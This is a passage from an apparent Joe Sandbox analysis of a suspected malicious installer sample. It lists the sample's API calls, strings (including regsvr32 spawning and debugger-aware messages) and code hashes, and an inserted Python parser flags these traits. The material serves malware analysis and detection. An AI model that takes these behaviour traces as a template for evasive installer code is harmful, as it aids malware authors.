                                                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                            • API String ID: 1914119943-2711329623
                                                                                            • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                            • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                            • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                            • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                            APIs
                                                                                            • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                            • SaveDC.GDI32(?), ref: 00416E27
                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                            • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                            • DeleteObject.GDI32(?), ref: 00416F22
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                            • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                            • String ID:
                                                                                            • API String ID: 375863564-0
                                                                                            • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                            • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                            • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                            • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                            • String ID:
                                                                                            • API String ID: 1694776339-0
                                                                                            • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                            • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                            • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                            • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                            APIs
                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                            • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                            • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Delete$EnableItem$System
                                                                                            • String ID:
                                                                                            • API String ID: 3985193851-0
                                                                                            • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                            • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                            • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                            • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                            • SendNotifyMessageA.USER32(0001042E,00000496,00002710,00000000), ref: 00481A97
                                                                                            Strings
                                                                                            • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                            • Deinitializing Setup., xrefs: 00481872
                                                                                            • Restarting Windows., xrefs: 00481A72
                                                                                            • DeinitializeSetup, xrefs: 0048190D
                                                                                            • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary$MessageNotifySend
                                                                                            • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                            • API String ID: 3817813901-1884538726
                                                                                            • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                            • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                            • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                            • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                            APIs
                                                                                            • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                            • GetActiveWindow.USER32 ref: 0046172B
                                                                                            • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                            • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                            • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                            • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                            • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                            • String ID: A
                                                                                            • API String ID: 2684663990-3554254475
                                                                                            • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                            • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                            • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                            • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                              • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                            • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                            • API String ID: 884541143-1710247218
                                                                                            • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                            • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                            • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                            • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                            • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                            • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                            • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                            • API String ID: 190572456-3516654456
                                                                                            • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                            • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                            • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                            • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
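The per-function "APIs" listings above are dense to read by eye: each bullet carries the API, its module, the stack slots Joe Sandbox captured (hex values, "?" for unresolved, or a resolved string such as an export name), the call-site address, and sometimes a "Part of subcall function" prefix. The following Python is an added example, not Joe Sandbox code and not part of this report: it parses records in exactly this layout into structured objects, pulls out the export names that a function resolves through GetProcAddress (here the zlib inflate* family), and applies a few triage flags. The sample text is a constructed, shortened excerpt of lines from this page, and the flag rules (dynamic import resolution, deletion APIs, a regsvr32 or "debugger" string) are this example's own heuristics.

```python
"""Parse Joe Sandbox per-function "APIs" listings into structured records and flag
behaviours worth a second look. Added example, not Joe Sandbox code; the flag rules
are this example's own heuristics and SAMPLE is a constructed, shortened excerpt."""
import re
from dataclasses import dataclass, field

# Constructed excerpt in the report's own layout: three function records, arguments shortened.
SAMPLE = """\
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
• GetActiveWindow.USER32 ref: 0046172B
  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,Inno-Setup-RegSvr-Mutex,?), ref: 00406F5B
Memory Dump Source
• Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
APIs
• FreeLibrary.KERNEL32(10000000), ref: 00481A11
Strings
• Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
Memory Dump Source
• Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
APIs
• GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
• GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
• CloseHandle.KERNEL32(?,?,00000044,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
"""

# One "APIs" bullet: optional subcall prefix, Api.MODULE, optional "(args)", then "ref: addr".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
STR_RE = re.compile(r"^\s*•\s*(?P<s>.*?),\s*xrefs:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
IID_RE = re.compile(r"^\s*•\s*Instruction ID:\s*(?P<id>[0-9a-fA-F]+)\s*$")
# Stack slots print as 8 hex digits, "-XXXXXXXX" or "?"; anything else is a resolved string.
HEX_ARG = re.compile(r"^-?[0-9A-Fa-f]{8}$|^\?$")


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    subcall: str = ""  # address of the sub-function when the bullet is a "Part of subcall" line

    def string_args(self) -> list:
        return [a for a in self.args if not HEX_ARG.match(a)]


@dataclass
class FuncRecord:
    instruction_id: str = ""
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)


def parse_report(text: str) -> list:
    """Start a new record at each "APIs" header; collect calls, strings and Instruction ID."""
    records, cur, section = [], None, None
    for line in text.splitlines():
        s = line.strip()
        if s in ("APIs", "Strings", "Memory Dump Source"):
            section = s
            if s == "APIs":
                cur = FuncRecord()
                records.append(cur)
            continue
        if cur is None:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"] or ""))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append(m["s"])
        elif section == "Memory Dump Source" and (m := IID_RE.match(line)):
            cur.instruction_id = m["id"]
    return records


def resolved_imports(rec: FuncRecord) -> list:
    """Export names passed to GetProcAddress, i.e. imports the function resolves at run time."""
    return [a for c in rec.calls if c.api == "GetProcAddress" for a in c.string_args()]


DELETION_APIS = {"DeleteFileA", "DeleteFileW", "RemoveDirectoryA", "RemoveDirectoryW"}


def flags(rec: FuncRecord) -> list:
    apis = {c.api for c in rec.calls}
    blob = " ".join([a for c in rec.calls for a in c.string_args()] + rec.strings).lower()
    out = set()
    if "GetProcAddress" in apis:
        out.add("dynamic-import-resolution")
    if apis & DELETION_APIS:
        out.add("file-or-dir-deletion")
    if "regsvr32" in blob:
        out.add("regsvr32-spawn-hint")
    if "debugger" in blob:
        out.add("debugger-aware-string")
    return sorted(out)


if __name__ == "__main__":
    print([(r.instruction_id[:8], flags(r), resolved_imports(r)) for r in parse_report(SAMPLE)])
```

Calls reached through "Part of subcall function" lines are kept in the same record (with the sub-function address in `subcall`), because the sandbox attributes them to the caller's behaviour; a string such as `Inno-Setup-RegSvr-Mutex` is only matched whole, so the mutex name alone does not trigger the regsvr32 flag. To run this over a saved report, paste the relevant section of the page in place of `SAMPLE`.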
                                                                                            APIs
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                            • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                            • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                            • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$StretchText
                                                                                            • String ID:
                                                                                            • API String ID: 2984075790-0
                                                                                            • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                            • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                            • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                            • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                            APIs
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDirectoryHandleSystem
                                                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                            • API String ID: 2051275411-1862435767
                                                                                            • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                            • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                            • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                            • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                            APIs
                                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                            • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                            • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$Color$Draw$OffsetRect
                                                                                            • String ID:
                                                                                            • API String ID: 1005981011-0
                                                                                            • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                            • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                            • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                            • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041B745
                                                                                            • GetDC.USER32(?), ref: 0041B751
                                                                                            • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                            • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                            • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                            • String ID: %H
                                                                                            • API String ID: 3275473261-1959103961
                                                                                            • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                            • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
